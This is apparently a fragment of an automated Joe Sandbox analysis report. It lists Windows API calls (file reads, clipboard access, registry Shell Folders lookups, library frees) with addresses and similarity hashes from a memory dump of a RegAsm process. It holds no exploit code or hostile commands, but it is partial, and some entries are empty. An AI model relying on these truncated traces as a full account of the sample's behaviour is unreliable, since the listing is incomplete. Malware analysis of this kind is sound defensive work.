                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                                                                                                                                                                  • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 0040CC98
                                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2445788494-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memcmpmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1065087418-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??2@YAPAXI@Z.MSVCRT ref: 0040ECF9
                                                                                                                                                                                  • Part of subcall function 0040ECD8: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 0040EDC0
                                                                                                                                                                                • GetStdHandle.KERNEL32(000000F5), ref: 00410530
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00410654
                                                                                                                                                                                  • Part of subcall function 004096DC: CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                  • Part of subcall function 0040973C: GetLastError.KERNEL32 ref: 00409750
                                                                                                                                                                                  • Part of subcall function 0040973C: _snwprintf.MSVCRT ref: 0040977D
                                                                                                                                                                                  • Part of subcall function 0040973C: MessageBoxW.USER32(?,?,Error,00000030), ref: 00409796
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Handle$??2@??3@CloseCreateErrorFileLastMessage_snwprintf
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1381354015-0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00403A16: memset.MSVCRT ref: 00403A55
                                                                                                                                                                                  • Part of subcall function 0040A02C: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                                                                                                  • Part of subcall function 0040A02C: GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                                  • Part of subcall function 0040A02C: CloseHandle.KERNEL32(00000000), ref: 0040A061
                                                                                                                                                                                • CompareFileTime.KERNEL32(?,?,00000000,?,00000000), ref: 004039D4
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$Time$CloseCompareCreateHandlememset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2154303073-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$PointerRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3154509469-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetPrivateProfileIntW.KERNEL32(?,?,?,?), ref: 00414588
                                                                                                                                                                                  • Part of subcall function 004143F1: memset.MSVCRT ref: 00414410
                                                                                                                                                                                  • Part of subcall function 004143F1: _itow.MSVCRT ref: 00414427
                                                                                                                                                                                  • Part of subcall function 004143F1: WritePrivateProfileStringW.KERNEL32(?,?,00000000), ref: 00414436
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: PrivateProfile$StringWrite_itowmemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 4232544981-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,?,004452FB,?,?,?,0040333C,?), ref: 00444A65
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • K32GetModuleFileNameExW.KERNEL32(00000104,00000000,00413E1F,00000104,00413E1F,00000000,?), ref: 00413F46
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileModuleName
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 514040917-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2738559852-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • WriteFile.KERNEL32(?,00000009,?,00000000,00000000), ref: 0040A325
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FileWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3934441357-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • CreateFileW.KERNEL32(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 613200358-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • FreeLibrary.KERNEL32(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • EnumResourceNamesW.KERNEL32(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: EnumNamesResource
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3334572018-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FreeLibrary
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3664257935-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • FindClose.KERNEL32(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • RegOpenKeyExW.KERNEL32(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Open
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 71445658-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3188754299-0
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 004095FC
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                                                                                                                  • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                                                                                                                  • Part of subcall function 004091B8: memcmp.MSVCRT ref: 004092D9
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3655998216-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • memset.MSVCRT ref: 00445426
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                  • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                  • Part of subcall function 00409B98: GetFileAttributesW.KERNEL32(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                  • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                  • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                  • Part of subcall function 0040B6EF: CreateFileW.KERNEL32(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1828521557-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                  • Part of subcall function 004062A6: SetFilePointerEx.KERNEL32(0040627C,?,?,00000000,00000000), ref: 004062C2
                                                                                                                                                                                • memcpy.MSVCRT(00000000,00000000,?,00000000,00000000,?,00000000,0040627C), ref: 00406942
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@FilePointermemcpy
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 609303285-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: _wcsicmp
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2081463915-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF), ref: 0040629C
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                                                                                                                  • Part of subcall function 0040A2EF: ReadFile.KERNEL32(00000000,00000000,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: File$CloseCreateErrorHandleLastRead
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 2136311172-0
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                                                                                                                • ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1936579350-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                APIs
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: free
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1294909896-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                  • Part of subcall function 004096C3: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040995D
                                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 00409974
                                                                                                                                                                                • CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3604893535-0
                                                                                                                                                                                APIs
                                                                                                                                                                                • EmptyClipboard.USER32 ref: 00409882
                                                                                                                                                                                • wcslen.MSVCRT ref: 0040988F
                                                                                                                                                                                • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                                                                                                                • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                                                                                                                • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                                                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                                                                                                                • CloseClipboard.USER32 ref: 004098D7
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004182D7
                                                                                                                                                                                  • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                                                                                                                • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                                                                                                                • LocalFree.KERNEL32(?), ref: 00418342
                                                                                                                                                                                • free.MSVCRT ref: 00418370
                                                                                                                                                                                  • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                                                                                                                                                                                  • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                                                                                                                • String ID: OsError 0x%x (%u)
                                                                                                                                                                                APIs
                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?), ref: 00409A5C
                                                                                                                                                                                  • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                                                                                                  • Part of subcall function 00409A45: GetTempFileNameW.KERNEL32(?,0040B827,00000000,?), ref: 00409A85
                                                                                                                                                                                • OpenClipboard.USER32(?), ref: 00411878
                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0041188D
                                                                                                                                                                                  • Part of subcall function 004098E2: EmptyClipboard.USER32 ref: 004098EC
                                                                                                                                                                                  • Part of subcall function 004098E2: GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                                                                                                                  • Part of subcall function 004098E2: GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                                                                                                                  • Part of subcall function 004098E2: GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                                                                                                                  • Part of subcall function 004098E2: ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                                                                                                                  • Part of subcall function 004098E2: GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                                                                                                                  • Part of subcall function 004098E2: SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                                                                                                                  • Part of subcall function 004098E2: CloseHandle.KERNEL32(?), ref: 00409969
                                                                                                                                                                                  • Part of subcall function 004098E2: CloseClipboard.USER32 ref: 0040997D
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Clipboard$FileGlobal$CloseTemp$AllocDataDirectoryEmptyErrorHandleLastLockNameOpenPathReadSizeUnlockWindows
                                                                                                                                                                                • String ID:
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: Version
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • NtdllDefWindowProc_W.NTDLL(?,?,?,?,00401B0D,?,?,?), ref: 004018D2
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000018.00000002.491006778.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_24_2_400000_RegAsm.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: NtdllProc_Window
                                                                                                                                                                                • String ID:
                                                                                                                                                                                APIs
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022A6
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 004022D7
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402305
                                                                                                                                                                                • _wcsicmp.MSVCRT ref: 00402333
                                                                                                                                                                                  • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
